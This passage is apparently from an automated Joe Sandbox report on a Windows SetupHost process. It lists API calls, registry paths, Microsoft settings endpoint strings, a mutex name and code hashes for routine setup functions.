                                                                                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 009BD265
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 009BD26F
                                                                                                                                                                                                                • RegCreateKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,00000000,00020019,00000000,?,?), ref: 009BD2A6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BD2E1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CloseCreateCurrentErrorLastWow64
                                                                                                                                                                                                                • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                                                                                                                • API String ID: 2503966421-1711884389
                                                                                                                                                                                                                • Opcode ID: 17425702dc88dbcd40306d20f3efb4a8a93ca01874ddd3a49b5a08efd8960970
                                                                                                                                                                                                                • Instruction ID: 728b43928538aebf4347b4bfc197bc319510a1f89e6b5272319410419b01c27c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17425702dc88dbcd40306d20f3efb4a8a93ca01874ddd3a49b5a08efd8960970
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7215C31E01219EBDF14DFE5DA49AEEBBB9AF84364F004469E915E3250E7749E01CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • settings-win-ppe.data.microsoft.com, xrefs: 009BAFE0
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::SetServerEndpoint, xrefs: 009BAF76, 009BAFA1
                                                                                                                                                                                                                • TestMode, xrefs: 009BAFBA
                                                                                                                                                                                                                • SYSTEM\Setup\MoSetup, xrefs: 009BAFB4
                                                                                                                                                                                                                • settings-win.data.microsoft.com, xrefs: 009BAF87
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::SetServerEndpoint$SYSTEM\Setup\MoSetup$TestMode$settings-win-ppe.data.microsoft.com$settings-win.data.microsoft.com
                                                                                                                                                                                                                • API String ID: 431132790-2510570186
                                                                                                                                                                                                                • Opcode ID: f07e1702e4fe7a1098d9ce296caad76256c0ac073b2d021fef3395242d668d1b
                                                                                                                                                                                                                • Instruction ID: 75cebaedc683964e6f876ea80ca0a8d118fa82ec912715207e9f9f1cbfd07fe1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f07e1702e4fe7a1098d9ce296caad76256c0ac073b2d021fef3395242d668d1b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E11D3B1B013258BCF15EFA48A51AFE7276AFC4720F204429F911AB381DF708D40C7A2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
                                                                                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 009BD10E
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CloseCurrentErrorLastOpenWow64
                                                                                                                                                                                                                • String ID: SYSTEM\Setup\MoSetup\Volatile
                                                                                                                                                                                                                • API String ID: 3444879603-1711884389
                                                                                                                                                                                                                • Opcode ID: f8078da8d67ca299c104d0a5a330e98b42984218162b5ea81be6adc8745b769a
                                                                                                                                                                                                                • Instruction ID: b86e26afe15e48c0fc07143fb58e1cd4f55ed162fa3b35d1bbb4489ad220758a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8078da8d67ca299c104d0a5a330e98b42984218162b5ea81be6adc8745b769a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C112171A04218EBCF14EFE9D9889DEBBBCEF88360B148469F505D7250EA749E01DB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileVersionInfoSizeExW.VERSION(00000003,?,00000000,?,00000000,?,00000000), ref: 009BF4B0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00000000), ref: 009BF4C1
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 009BF4C8
                                                                                                                                                                                                                • GetFileVersionInfoExW.VERSION(00000003,?,00000000,?,00000000,?,00000000), ref: 009BF4E0
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000008,?,00000000), ref: 009BF4F9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BF506
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009BF50D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FileInfoProcessVersion$AllocErrorFreeLastSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 91032023-0
                                                                                                                                                                                                                • Opcode ID: de64be203047c6f8e7247fb724d42660e5a48bec598c3ef76f0c787219d48cb9
                                                                                                                                                                                                                • Instruction ID: ab3a77ce4931c5adc1c7aadd328123b9d1fb2bc4feef0de5eb35cac0b6329e47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: de64be203047c6f8e7247fb724d42660e5a48bec598c3ef76f0c787219d48cb9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5019636A44315BBD7119FE99D1CBEF7F7DEB44761F048064B909D2150DA708A0187A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,009BF550,?,00000000), ref: 009BE3B4
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE660
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: GetLastError.KERNEL32(?,?,?,009BE360,?,00000000,00000000,009BF550), ref: 009BE676
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6C3
                                                                                                                                                                                                                  • Part of subcall function 009BE5FC: _wcsnicmp.MSVCRT ref: 009BE6DB
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,009BF550,?,00000000), ref: 009BE367
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009BE383
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BE38E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009BE395
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,009BF550,?,00000000), ref: 009BE39D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 009BE3A6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 686246089-0
                                                                                                                                                                                                                • Opcode ID: fc9ee3ae0b152643a9379b944a687b91b547e33c88fd307ea046213843251845
                                                                                                                                                                                                                • Instruction ID: 08c478ef3b92acbe3ca963e6c1561a7ec27d8280cbc868a065f7a0b935c51f24
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc9ee3ae0b152643a9379b944a687b91b547e33c88fd307ea046213843251845
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99F0283B508320ABD720A7F85D4C9EF2ABCEB8577271A8724FC12C32A0D7204C035690
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009BB216
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009BB237
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009BB23E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 009BB29E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BB2A5
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 009BB2B4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess$Close$AllocCurrentErrorFreeLastQueryValueWow64
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 700423131-0
                                                                                                                                                                                                                • Opcode ID: ac72dcdc0a7403274ef5aac5c3584bb54e7c8204908cb6bb17a0be2efa38bc8c
                                                                                                                                                                                                                • Instruction ID: c29640feec54796037fff2bee305995f8bb4f88b8509469ae40d86eaee5a35c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac72dcdc0a7403274ef5aac5c3584bb54e7c8204908cb6bb17a0be2efa38bc8c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74219631A00319EBDF11DFE0CE89BEEB77DAF58324F108569A91596191CBB48E04CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009BB430
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000001,?,00000000), ref: 009BB451
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 009BB458
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,?,?,00000000), ref: 009BB4B8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009BB4BF
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BB4CE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapProcess$Close$AllocCurrentErrorFreeLastQueryValueWow64
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 700423131-0
                                                                                                                                                                                                                • Opcode ID: 3d338447a105aa59b266f96567231feb506f65012a722de3ec8a029a85d49152
                                                                                                                                                                                                                • Instruction ID: 73e253b08407eee48eb2ce8a2bedb747dac2e4ea2ab3f979d5f3c1264101c535
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d338447a105aa59b266f96567231feb506f65012a722de3ec8a029a85d49152
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08216771A0031DEBDB11DFE4CA88BEEB77EFF44324F108569A901561A2D7B48E05DB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009FE8EC
                                                                                                                                                                                                                  • Part of subcall function 009B9180: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?), ref: 009B91BD
                                                                                                                                                                                                                  • Part of subcall function 009B9180: GetLastError.KERNEL32(?,?,00000104,?,?), ref: 009B91C9
                                                                                                                                                                                                                • GetFileVersionInfoSizeExW.VERSION(00000000,00000000,?,00000014,009FE880,?,?), ref: 009FE914
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009FE921
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009FE935
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009FE93C
                                                                                                                                                                                                                • GetFileVersionInfoExW.VERSION(00000000,00000000,?,00000000,00000000), ref: 009FE955
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileHeapInfoLastVersion$AllocEnvironmentExpandH_prolog3ProcessSizeStrings
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2253041425-0
                                                                                                                                                                                                                • Opcode ID: 129261ea61bbb18f1b38230e6b76c7bbb960a3e7bf9a5cfa95c1b67065b8c658
                                                                                                                                                                                                                • Instruction ID: 38823895cf95c56488b05f4155da56ad35da40f6934de957adbab48ba4e778e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 129261ea61bbb18f1b38230e6b76c7bbb960a3e7bf9a5cfa95c1b67065b8c658
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C118131A0420E9BDF51EFE0C9497FE7A79AF80365F104424E611AB2A0DBB48E01DBB1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,005250CC,?,?,00A0530B,?,005250C0,?,00A01F5A,?,005250C0,00000000,?), ref: 00A05294
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00A0530B,?,005250C0,?,00A01F5A,?,005250C0,00000000,?,?,00A01F26,?,00000004,0099C820), ref: 00A0529B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,005250CC,?,005250CC,?,?,00A0530B,?,005250C0,?,00A01F5A,?,005250C0,00000000,?), ref: 00A052BD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00A0530B), ref: 00A052C4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00A0530B,?,005250C0,?,00A01F5A,?,005250C0,00000000,?,?,00A01F26,?,00000004), ref: 00A052CC
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A0530B,?,005250C0,?,00A01F5A,?,005250C0,00000000,?,?,00A01F26,?,00000004,0099C820), ref: 00A052D3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocAllocateFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1927113959-0
                                                                                                                                                                                                                • Opcode ID: 58cf03bb110c588872aa24af7b07d3a6269f0a9ab3594deda73eb174152cdddf
                                                                                                                                                                                                                • Instruction ID: 6406cef585c3b519cd6da8aa0de8de3190f702c408273159b962797fd5705d9e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58cf03bb110c588872aa24af7b07d3a6269f0a9ab3594deda73eb174152cdddf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A115E71904B069FD7209FA6E898A97BBFCFF6C355B10882DE58683650D770D841CF20
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeSid.ADVAPI32(00000000,00A021D3,?,00000001,00A12740,0000003C), ref: 00A02211
                                                                                                                                                                                                                • FreeSid.ADVAPI32(00000000,00A021D3,?,00000001,00A12740), ref: 00A02223
                                                                                                                                                                                                                • FreeSid.ADVAPI32(00000000,00A021D3,?,00000001,00A12740), ref: 00A02235
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00A12740), ref: 00A02246
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00A021D3,?,00000001,00A12740), ref: 00A02255
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000001), ref: 00A0225C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Free$Heap$CloseHandleProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2806346229-0
                                                                                                                                                                                                                • Opcode ID: a1a02b1dfa3c42aaf875af6878fad0261af1c630a10f61a70ab87706f3d2eb5c
                                                                                                                                                                                                                • Instruction ID: 03973fe30880d8ebfac8ac5ceb9e8fe875f1436f8b88fd358c526b87a94ca0ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1a02b1dfa3c42aaf875af6878fad0261af1c630a10f61a70ab87706f3d2eb5c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EF06D79C04308ABCB119FE5E98CBDDBA79BB5C712F14A029F415B12A0C7344885CF20
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009B8917
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,0000000C,009ACD31,00000000), ref: 009B8A09
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeH_prolog3Library
                                                                                                                                                                                                                • String ID: CreateSetupObject
                                                                                                                                                                                                                • API String ID: 1631603194-1491363812
                                                                                                                                                                                                                • Opcode ID: 898743be55da43aae7366acb5d36e5ba5ca5f25c22396fbfe9e01beef00ee936
                                                                                                                                                                                                                • Instruction ID: c486e88b348ad0bc3ca5028fb53afd125e784c55f5d8c895ceb6f89e8edf384f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 898743be55da43aae7366acb5d36e5ba5ca5f25c22396fbfe9e01beef00ee936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1313870A0031A8BCF15DFA9CA946FFB6B9AF88320F104429E915A7391CF749D01CB52
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001), ref: 00A0A66A
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00A0A67C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 00A0A6A4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateErrorLastMutexObjectSingleWait_vsnwprintf
                                                                                                                                                                                                                • String ID: %s+%s+%s$Global\OneSettingQueryMutex
                                                                                                                                                                                                                • API String ID: 551164369-777283268
                                                                                                                                                                                                                • Opcode ID: ec723176716d9e3b5272b38d99af216eb451c80263f1f2733f04a4b5c18ada6d
                                                                                                                                                                                                                • Instruction ID: 1ae14476788d27043a3d80efafeabfc83ea4458d390b7d8727d0e1cf0123a3eb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec723176716d9e3b5272b38d99af216eb451c80263f1f2733f04a4b5c18ada6d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD112BB531030DA7DB10DBB4ED49BEA37FC9F24314F288565F501DA1D0EA76D9418B62
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
